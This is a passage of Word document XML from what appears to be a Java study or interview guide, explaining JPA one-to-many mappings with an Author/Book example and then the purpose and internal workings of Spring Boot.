    <w:p w14:paraId="0CDDA53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Many" side (Book)</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The Book class will have a reference to the Author class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E17BDA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de Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD413AC"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Author Entity (One side):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6603A36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34A13C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util.Set;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2894310B" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="582A344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6623A9D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Author {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013732C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA329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77332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596091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68B202B1" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="101E3F7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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73752858" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7099A4B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One author can have multiple books</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514FE3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OneToMany(mappedBy = "author", fetch = FetchType.LAZY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D1F7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et&lt;Book&gt; books;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121C0981" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58A55CC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5AE505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1F02F2C6"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Book Entity (Many side):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F284E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5852A3EB" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7567445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15B4980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Book {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C389B1B" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32A349D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D5511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0388804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26AD9C3A" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D4F29A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title;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FD9136" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AB8783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Many books belong to one author</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E9C22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ManyToOne(fetch = FetchType.LAZY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC9638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JoinColumn(name = "author_id")  // The foreign key column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFAF4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Author author;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5581B107" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B71490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740BC2E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0240C94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Key Annotations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A77371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on the "one" side):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A881B1D"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mappedBy</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This attribute is used to specify the field in the "many" side that owns the relationship. In this case, the author field in the Book class owns the relationship.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7284D7C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fetch = FetchType.LAZY</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The fetch type can be LAZY or EAGER. LAZY means books will be fetched only when needed, i.e., when we access the books field of Author.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D56DD5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One</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (on the "many" side):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38767EB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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This annotation represents the many-to-one relationship. Each book has one author.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E81529"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JoinColumn(name = "author_id")</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This specifies the foreign key column in the Book table that refers to the Author table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4680A833"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How It Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C192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hen you persist an Author, Hibernate will not automatically insert the Book entities. You must manually assign Book entities to the Author entity and persist them separately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D18812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ensures that the Author class is aware that the relationship is maintained in the Book class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201EA13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fetch = FetchType.LAZY ensures that the books collection in Author is not loaded from the database unless accessed explicitly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521A6BE1"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Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA96E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an Author</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310033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 author = new Author();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB3A0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Name("J.K. Rowling");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591348D0" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53DD353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books</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684E8CA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1 = new Book();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2876426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Title("Harry Potter and the Sorcerer's Stone");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDD2BB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Author(author);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE24F2A" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B03CFA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2 = new Book();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C41375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Title("Harry Potter and the Chamber of Secrets");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF5EFD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Author(author);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FF952C" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="750AB96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Assigning books to author</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3777D7D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t&lt;Book&gt; books = new HashSet&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA1610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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4914FD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2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45595F4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Books(books);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A96E1B" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="007F3379" w:rsidRDefault="0099012D" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EF1BB9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Persisting the Author and Books</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB5F8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author);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220487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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BC1F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2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2600594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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766E59B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is used to define a one-to-many relationship.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027519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n this relationship, one entity (e.g., Author) is related to multiple entities (e.g., Book).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615A51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on the "one" side (Author) indicates the owning side of the relationship, which is the "many" side (Book).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E2A63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nyToOne annotation on the "many" side (Book) defines the foreign key relationship.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C17173" w14:textId="77777777" w:rsidR="0099012D" w:rsidRPr="00CE4B95"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471" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0EE869" w14:textId="4BA34996" w:rsidR="00AF0B20" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF0B20" w:rsidP="00AF0B20">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7820C4" w14:textId="7DEB35C3" w:rsidR="00071C81" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0B8D" w:rsidP="00071C81">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="579" w:name="_Toc197867793"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Spring Boot</w:t>
      </w:r>
      <w:bookmarkEnd w:id="579"/>
    </w:p>
    <w:p w14:paraId="764721A3" w14:textId="77777777" w:rsidR="00972DE6" w:rsidRPr="00CE4B95" w:rsidRDefault="00972DE6" w:rsidP="00972DE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="274DF885" w14:textId="0DBEA9FB" w:rsidR="00972DE6" w:rsidRPr="00CE4B95" w:rsidRDefault="00594200" w:rsidP="00972DE6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="580" w:name="_Toc197867794"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Spring Boot? Why is it used</w:t>
      </w:r>
      <w:r w:rsidR="00972DE6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="580"/>
    </w:p>
    <w:p w14:paraId="40400409" w14:textId="74BCDEB3" w:rsidR="001F0776" w:rsidRPr="00CE4B95" w:rsidRDefault="001F0776" w:rsidP="00D23D62">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CE4B95" w:rsidRDefault="001F0776" w:rsidP="001F0776">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key reasons why Spring Boot is used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B02DA5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Auto-Configuration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Standalone Applications:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Production-Ready Features:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Minimal Configuration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Rapid Development:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Easy Integration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Pr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="001F0776">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="7B11AF3E">
          <v:rect id="_x0000_i2472" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B085A82" w14:textId="12F9B589" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00FE7F8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="581" w:name="_Toc197867795"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain internal working of Spring Boot application?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="581"/>
    </w:p>
    <w:p w14:paraId="72830C91" w14:textId="6103FD06" w:rsidR="00FE7F8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00FE7F8E" w:rsidP="00EC55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workings of a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot application</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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pplication Startup and Auto-Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C779E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BootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3222B0C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Marks the class as a source of bean definitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4311492A"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Application.run()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB6019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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22354B93"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s the Spring context (ApplicationContext).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A0FF0C"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s the embedded server (Tomcat, Jetty, or Undertow by default).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4865557D"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application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728D66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ypically the entry point:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359162D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258A4CE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pringApplication.run(MyApplication.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B49EC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3CB507"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mbedded Web Server (Tomcat, Jetty, Undertow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF99A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uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the embedded web server. You can configure other web servers like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Jet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ndertow</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB721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uto-Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D7A4D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s </w:t>
      </w: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or example, if </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Data JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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is no custom configuration, Spring Boot will apply default configuration, such as using an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>embedded H2 databas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H2 console</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8B037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pring Context (ApplicationContext)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C6A2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responsible for </w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BC998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pplication starts, Spring Boot initializes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and wires up all the necessary beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710D2B1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ean Instantiation and Dependency Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213A051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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a Spring Boot application can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>autowired</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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uses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xml:space="preserve"> to provide dependencies into the beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0258DAE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eans are managed by Spring’s </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Inversion of Control (IoC) container</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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quest Handling (DispatcherServlet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D7DA5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follows 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model of request handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DFE39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outes incoming HTTP requests to the corresponding </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Controller methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> based on URL mappings (@RequestMapping, @GetMapping, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABF7C2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er Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9DA44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spatcherServlet uses </w:t>
      </w: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to map requests to controller methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B40AF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Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9E2E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oller</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Service Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB553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layer is typically annotated with @Service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2040535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Repository Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645DE08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pository</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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1. Transaction Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523287D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2. Security (Spring Security)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79ABA62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Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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easily configure JWT, OAuth2, and other security mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A873D9F"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3. Exception Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1153DAA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4. Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774BE65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comes with logging capabilities out of the box (using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SLF4J</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gb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g4j2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
